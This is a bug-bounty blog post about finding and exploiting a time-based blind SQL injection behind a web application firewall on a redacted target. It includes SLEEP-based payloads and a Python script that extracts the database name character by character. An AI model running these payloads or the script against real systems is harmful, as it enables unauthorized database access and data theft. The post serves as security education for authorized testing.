Unauthorized SQL Injection: Turning ‘No Entry’ Signs into Dollar Signs!

1 month ago 16
BOOK THIS SPACE FOR AD
ARTICLE AD

Pushkar Bhagat

SQL injection vulnerabilities continue to pose a significant risk to web application security. One particularly sophisticated variant is time-based SQL injection, which allows attackers to infer information about the database by manipulating SQL queries. In this post, we’ll explore how to identify and exploit this vulnerability effectively while also discussing its potential impact and ethical considerations.

Discovering the Vulnerability

During a recent security assessment of a private program, I encountered a login page where I searched for an ID parameter in the source code and found a path formatted as content/id/77. To investigate whether this parameter interacted with the database, I appended a single quote (') to the ID value. If the parameter were linked to an SQL query, this would likely cause a disruption, potentially revealing a vulnerability.

After testing various IDs and receiving a MySQL server error instead of a 404 response, I suspected an SQL injection vulnerability. However, a Web Application Firewall (WAF) was in place, blocking common special characters and suspicious keywords, which complicated my efforts. Even SQLMAP struggled to interact with the endpoint due to these WAF restrictions.

To bypass this obstacle, I began testing it manually, and the easiest one executed successfully.

content/id/77 AND SLEEP(60)

This command executed a time delay of 60 seconds if the injection was successful. The use of AND as a logical operator in SQL ensures that all conditions must be true for the overall statement to succeed. Observing a delayed response confirmed that my payload was executed, indicating a time-based SQL injection vulnerability.

Extracting Database Information

With the existence of the vulnerability confirmed, the next challenge was to extract sensitive information, such as the database name. Knowing the database name had a confirmed length of 11 characters, we needed a method to systematically identify each character.

To test if the first character of the database name was 'a', I crafted the following payload:

id=20 AND IF(SUBSTRING(database(),1,1)=’a’,SLEEP(5),0)

This payload would introduce a 5-second delay if the first character matched 'a'. By iterating through each character in the alphabet (and possibly numbers or special characters), we could identify the exact characters of the database name.

Automating the Exploitation Process

While manually testing each character can yield results, it is often laborious and time-consuming. Thankfully, we can automate this process using tools like SQLMap; however, in my case, it was blocking me, so I wrote a Python script. Here’s a simplified Python script that automates the character extraction process:

import requests
import time

# Base URL with the injection point
url = "https://www.REACTED.com/{PATH}/77"
# Define the character set to test (extend if necessary)
characters = "abcdefghijklmnopqrstuvwxyz0123456789_"
db_name_length = 11 # Confirmed length of the database name
db_name = ""

# Loop through each position of the database name
for position in range(1, db_name_length + 1):
for char in characters:
# Construct the payload with the current character
payload = f"77 AND IF(SUBSTRING(database(),{position},1)='{char}',SLEEP(5),0)"

# Add a delay of 60 seconds before each request
time.sleep(60)

# Send the request with the payload
start_time = time.time()
response = requests.get(url + f"{payload}")
elapsed_time = time.time() - start_time

# Check if the response took longer than 5 seconds
if elapsed_time >= 5:
db_name += char # Append the found character to the db_name
print(f"Found character '{char}' at position {position}: {db_name}")
break # Move to the next position

print(f"Database name is: {db_name}")

Setup: Define the target URL and the character set for potential database name characters.Iterate Over Characters: For each position in the database name, iterate through possible characters.Payload Execution: Construct the SQL injection payload and send a request to the target URL.Adding Delay Before Request Delay: This introduces a 60-second delay before making the request. This is important for time-based SQL injection, as it allows you to measure the response time effectively. However, this will slow down the entire process significantly.Response Timing: Measure the response time to determine if the character matches.Character Collection: If a delay occurs, the script records the character and moves to the next position.

By systematically extracting data from the database, tables, and columns, you can maximize the exploitation of blind SQL injection vulnerabilities. Always ensure you have permission to test the systems, and be aware of the legal and ethical implications of your actions.

Happy Hacking!!

Read Entire Article